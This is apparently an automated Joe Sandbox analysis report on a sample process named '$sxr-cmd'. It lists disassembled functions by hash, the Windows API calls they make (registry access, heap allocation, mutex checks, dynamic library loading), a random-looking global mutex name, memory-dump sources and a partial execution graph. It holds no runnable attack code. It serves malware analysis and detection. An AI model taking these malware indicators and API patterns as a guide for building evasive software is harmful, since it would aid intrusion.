                                                                                                                      • Opcode ID: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                                      • Instruction ID: 8aca5d7f2e365e4ffb6e3447257a1ac7fa74675a29182e0eaa1e3f42eaca5367
                                                                                                                      • Opcode Fuzzy Hash: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                                      • Instruction Fuzzy Hash: 0141D93271AB4491EB20CF65E8483AA77B1F798BA4F804121EE4D8B799EB3DC545CB40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF61551A0FC
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6154FD46E
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6154FD485
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD4EE
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: iswspace.MSVCRT ref: 00007FF6154FD54D
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD569
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD58C
                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF61551A1FB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                      • String ID: Software\Classes
                                                                                                                      • API String ID: 2714550308-1656466771
                                                                                                                      • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                                      • Instruction ID: bb20722f6665759e941928dc67eae8f78d4749de80b7f675861ba86c04b3ecfa
                                                                                                                      • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                                      • Instruction Fuzzy Hash: E2419F26A09F5281EA01DB1AD484439A7B4FB85FE0F908131DA5E837B5DF79EC92C380
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleTitle
                                                                                                                      • String ID: -
                                                                                                                      • API String ID: 3358957663-3695764949
                                                                                                                      • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                      • Instruction ID: 4fd8cbf7555cc24e9ffaa6f176f586eccfdfa2e640cee05e9095f2afaf360955
                                                                                                                      • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                      • Instruction Fuzzy Hash: FB317E29A0CB4282EA149B19E814078E7A4AB4AFA4F585136D90E87BF5DF3CEC51C344
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsnicmpswscanf
                                                                                                                      • String ID: :EOF
                                                                                                                      • API String ID: 1534968528-551370653
                                                                                                                      • Opcode ID: 16430380be0fb913083b6884b205c0f5113cd8b1b31c6669d47242da84fc884d
                                                                                                                      • Instruction ID: fb997a48623f523b70301ba470e3b4428a2cf3c9081892f05e2761d9331dff70
                                                                                                                      • Opcode Fuzzy Hash: 16430380be0fb913083b6884b205c0f5113cd8b1b31c6669d47242da84fc884d
                                                                                                                      • Instruction Fuzzy Hash: C8316C39A18E42C6FB649B15A8402B9F6A0EF45F78F445132EA4DC66B1DF2CEC51C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 0000020D0B622A4D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleMutexOpen
                                                                                                                      • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                                      • API String ID: 3128266590-3670590667
                                                                                                                      • Opcode ID: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                                      • Instruction ID: 77a8a1506dc03aff2eae748c655d70968fab0cec47337070d9b872d8e6813e1e
                                                                                                                      • Opcode Fuzzy Hash: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                                      • Instruction Fuzzy Hash: 5A21C43660AB4442F770CB96A85871AB3B2F794FA0F854015DE8D4BB56FF39C845C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsnicmp
                                                                                                                      • String ID: /-Y
                                                                                                                      • API String ID: 1886669725-4274875248
                                                                                                                      • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                      • Instruction ID: 01de4be1db02d2e144695e587eb8aa0c4138a44e59183a2b243406e9a5acbeec
                                                                                                                      • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                      • Instruction Fuzzy Hash: 3E21656AE08F9581EA109F1A9544279FAB0BB44FE4F558032DE4D977A4DF3CEC92D700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 0000020D0B622B39
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleMutexOpen
                                                                                                                      • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                                      • API String ID: 3128266590-3670590667
                                                                                                                      • Opcode ID: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                                      • Instruction ID: e8b3ca5e35a7bcfd5410c4704d3f1f8157f511ba2f50e19cd11ecf2ac9a6f8e9
                                                                                                                      • Opcode Fuzzy Hash: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                                      • Instruction Fuzzy Hash: 0621B235609B4041F760DF96B89871A73B2F784F69F844029DE4D4B751FF3AC4468B44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Stringtry_get_function
                                                                                                                      • String ID: LCMapStringEx
                                                                                                                      • API String ID: 2588686239-3893581201
                                                                                                                      • Opcode ID: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                                      • Instruction ID: 035cdf40c030476bd667222e7fb0c170dd444dd583e386f4b7381cea23c94e80
                                                                                                                      • Opcode Fuzzy Hash: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                                      • Instruction Fuzzy Hash: 0B111A36609BC086E760CB56F48429AB7B5F7C9B90F944126EE8D87B1AEF38C4408B40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                      • String ID: csm
                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                      • Opcode ID: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                                      • Instruction ID: 99289c0748cbae9f70f0cd7b9b24a1584e94155972e2bf547f1a09e4d6d837e1
                                                                                                                      • Opcode Fuzzy Hash: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                                      • Instruction Fuzzy Hash: 86114C32219B8082EB208F25E44825977B2F7C8FA4F584220DF8D0BBA5EF3AC551CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 3$3
                                                                                                                      • API String ID: 0-2538865259
                                                                                                                      • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                      • Instruction ID: 042862f4396dbd4be5d8b8a9a6fc21a2cc9c3fc8c1f70d034efa725bd9c2804f
                                                                                                                      • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                      • Instruction Fuzzy Hash: 5601F779D0ED428AF3948B689884274F760BF55F39F945136C44E825B1EF3C6CA4DB41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                                                      • API String ID: 539475747-3084827643
                                                                                                                      • Opcode ID: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
                                                                                                                      • Instruction ID: 31cc55178c59ce8e9db92d07a94b988a67dbaa0edf0742ff0119a0bc1edd16bb
                                                                                                                      • Opcode Fuzzy Hash: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
                                                                                                                      • Instruction Fuzzy Hash: EAF0822570AB9091FB05CBC5F488699A272FB88FB0FC45036E95D0BB56EF3AC485C744
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                      • String ID: FlsSetValue
                                                                                                                      • API String ID: 738293619-3750699315
                                                                                                                      • Opcode ID: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
                                                                                                                      • Instruction ID: 92cd25a417a1d363d00088463a01956320e32060e21ebf1593024fd58f6e91f9
                                                                                                                      • Opcode Fuzzy Hash: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
                                                                                                                      • Instruction Fuzzy Hash: BCE0126120BB4091FA459BD5F9486996273FB88FA0FD89036D91D0F357FE3AC895C704
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006D6
                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006F0
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF61550074D
                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF615500762
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1617791916-0
                                                                                                                      • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                      • Instruction ID: 4d9c43b008e2ede26f8f316bc040d7ee20b9546814a3e236215ff3c47c08b911
                                                                                                                      • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                      • Instruction Fuzzy Hash: CF416E7AA09A4286EA588F10E44417AF7A0FF89FA4F989435CA4EC3770DF3CE945C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 756756679-0
                                                                                                                      • Opcode ID: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
                                                                                                                      • Instruction ID: ae37e9e9d1507a28799e7241592aa54756dfccaa33716ddc0c3002db92e6f670
                                                                                                                      • Opcode Fuzzy Hash: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
                                                                                                                      • Instruction Fuzzy Hash: 5421532260EF8485EB11CF99E40829AB3B2FB89FA4F954015DE8D5BB25FA79C4428740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1617791916-0
                                                                                                                      • Opcode ID: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
                                                                                                                      • Instruction ID: d6f622aa72fc4c88ab5ab2d18d9ba33d2fad21b8c96f3627565d8bc0fa6d2b0d
                                                                                                                      • Opcode Fuzzy Hash: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
                                                                                                                      • Instruction Fuzzy Hash: 44E0ED7161270496F704DFA2D81935976F2FB88F62F89C028C94D0B351EF7E84998754
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:2.1%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:200
                                                                                                                      Total number of Limit Nodes:7
                                                                                                                      execution_graph 15404 242878bb900 15405 242878bb911 _set_errno_from_matherr 15404->15405 15407 242878bb960 15405->15407 15408 242878bb8e0 15405->15408 15411 242878bb444 15408->15411 15410 242878bb8e9 15410->15407 15412 242878bb459 try_get_function 15411->15412 15417 242878bb473 _set_errno_from_matherr 15412->15417 15431 242878bd6a8 15412->15431 15414 242878bb48e 15414->15417 15434 242878bb900 15414->15434 15417->15410 15418 242878bb4bf 15421 242878bd6a8 _set_errno_from_matherr 3 API calls 15418->15421 15419 242878bb4af 15420 242878bd6a8 _set_errno_from_matherr 3 API calls 15419->15420 15422 242878bb4b6 15420->15422 15423 242878bb4c7 15421->15423 15438 242878bb978 15422->15438 15424 242878bb4dd 15423->15424 15425 242878bb4cb 15423->15425 15443 242878bb034 15424->15443 15427 242878bd6a8 _set_errno_from_matherr 3 API calls 15425->15427 15427->15422 15430 242878bb978 __free_lconv_mon 4 API calls 15430->15417 15447 242878bd36c 15431->15447 15433 242878bd6d6 __vcrt_freeptd 15433->15414 15435 242878bb911 _set_errno_from_matherr 15434->15435 15436 242878bb8e0 _set_errno_from_matherr 4 API calls 15435->15436 15437 242878bb4a1 15435->15437 15436->15437 15437->15418 15437->15419 15439 242878bb97d HeapFree 15438->15439 15440 242878bb9af 15438->15440 15439->15440 15441 242878bb998 15439->15441 15440->15417 15442 242878bb8e0 _set_errno_from_matherr 3 API calls 15441->15442 15442->15440 15444 242878bb0e6 _set_errno_from_matherr 15443->15444 15454 242878baf8c 15444->15454 15446 242878bb0fb 15446->15430 15448 242878bd3cd 15447->15448 15451 242878bd3c8 try_get_function 15447->15451 15448->15433 15449 242878bd4b0 15449->15448 15452 242878bd4be GetProcAddress 15449->15452 15450 242878bd3fc LoadLibraryExW 15450->15451 15451->15448 15451->15449 15451->15450 15453 242878bd457 LoadLibraryExW 15451->15453 15452->15448 15453->15451 15455 242878bafa8 15454->15455 15458 242878bb21c 15455->15458 15457 242878bafbe 15457->15446 15459 242878bb264 Concurrency::details::SchedulerProxy::DeleteThis 15458->15459 15460 242878bb238 Concurrency::details::SchedulerProxy::DeleteThis 15458->15460 15459->15457 15460->15459 15462 242878be784 15460->15462 15463 242878be820 15462->15463 15466 242878be7a7 15462->15466 15464 242878be873 15463->15464 15467 242878bb978 __free_lconv_mon 4 API calls 15463->15467 15528 242878be924 15464->15528 15466->15463 15471 242878be7e6 15466->15471 15473 242878bb978 __free_lconv_mon 4 API calls 15466->15473 15468 242878be844 15467->15468 15470 242878bb978 __free_lconv_mon 4 API calls 15468->15470 15469 242878be808 15472 242878bb978 __free_lconv_mon 4 API calls 15469->15472 15474 242878be858 15470->15474 15471->15469 15476 242878bb978 __free_lconv_mon 4 API calls 15471->15476 15478 242878be814 15472->15478 15479 242878be7da 15473->15479 15475 242878bb978 __free_lconv_mon 4 API calls 15474->15475 15480 242878be867 15475->15480 15481 242878be7fc 15476->15481 15477 242878be8de 15482 242878bb978 __free_lconv_mon 4 API calls 15478->15482 15488 242878c0f38 15479->15488 15485 242878bb978 __free_lconv_mon 4 API calls 15480->15485 15516 242878c1044 15481->15516 15482->15463 15483 242878bb978 HeapFree LoadLibraryExW LoadLibraryExW GetProcAddress __free_lconv_mon 15487 242878be87f 15483->15487 15485->15464 15487->15477 15487->15483 15489 242878c0f41 15488->15489 15514 242878c103c 15488->15514 15490 242878c0f5b 15489->15490 15491 242878bb978 __free_lconv_mon 4 API calls 15489->15491 15492 242878c0f6d 15490->15492 15493 242878bb978 __free_lconv_mon 4 API calls 15490->15493 15491->15490 15494 242878c0f7f 15492->15494 15495 242878bb978 __free_lconv_mon 4 API calls 15492->15495 15493->15492 15496 242878c0f91 15494->15496 15497 242878bb978 __free_lconv_mon 4 API calls 15494->15497 15495->15494 15498 242878c0fa3 15496->15498 15499 242878bb978 __free_lconv_mon 4 API calls 15496->15499 15497->15496 15500 242878c0fb5 15498->15500 15502 242878bb978 __free_lconv_mon 4 API calls 15498->15502 15499->15498 15501 242878c0fc7 15500->15501 15503 242878bb978 __free_lconv_mon 4 API calls 15500->15503 15504 242878c0fd9 15501->15504 15505 242878bb978 __free_lconv_mon 4 API calls 15501->15505 15502->15500 15503->15501 15506 242878bb978 __free_lconv_mon 4 API calls 15504->15506 15508 242878c0feb 15504->15508 15505->15504 15506->15508 15507 242878c0ffd 15510 242878c1012 15507->15510 15512 242878bb978 __free_lconv_mon 4 API calls 15507->15512 15508->15507 15509 242878bb978 __free_lconv_mon 4 API calls 15508->15509 15509->15507 15511 242878c1027 15510->15511 15513 242878bb978 __free_lconv_mon 4 API calls 15510->15513 15511->15514 15515 242878bb978 __free_lconv_mon 4 API calls 15511->15515 15512->15510 15513->15511 15514->15471 15515->15514 15517 242878c1049 15516->15517 15526 242878c10aa 15516->15526 15518 242878c1062 15517->15518 15519 242878bb978 __free_lconv_mon 4 API calls 15517->15519 15520 242878bb978 __free_lconv_mon 4 API calls 15518->15520 15521 242878c1074 15518->15521 15519->15518 15520->15521 15522 242878c1086 15521->15522 15523 242878bb978 __free_lconv_mon 4 API calls 15521->15523 15524 242878c1098 15522->15524 15525 242878bb978 __free_lconv_mon 4 API calls 15522->15525 15523->15522 15524->15526 15527 242878bb978 __free_lconv_mon 4 API calls 15524->15527 15525->15524 15526->15469 15527->15526 15529 242878be954 15528->15529 15530 242878be929 15528->15530 15529->15487 15530->15529 15534 242878c1108 15530->15534 15533 242878bb978 __free_lconv_mon 4 API calls 15533->15529 15535 242878be94c 15534->15535 15536 242878c1111 15534->15536 15535->15533 15570 242878c10b0 15536->15570 15539 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15540 242878c113a 15539->15540 15541 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15540->15541 15542 242878c1148 15541->15542 15543 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15542->15543 15544 242878c1156 15543->15544 15545 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15544->15545 15546 242878c1165 15545->15546 15547 242878bb978 __free_lconv_mon 4 API calls 15546->15547 15548 242878c1171 15547->15548 15549 242878bb978 __free_lconv_mon 4 API calls 15548->15549 15550 242878c117d 15549->15550 15551 242878bb978 __free_lconv_mon 4 API calls 15550->15551 15552 242878c1189 15551->15552 15553 242878c10b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15552->15553 15554 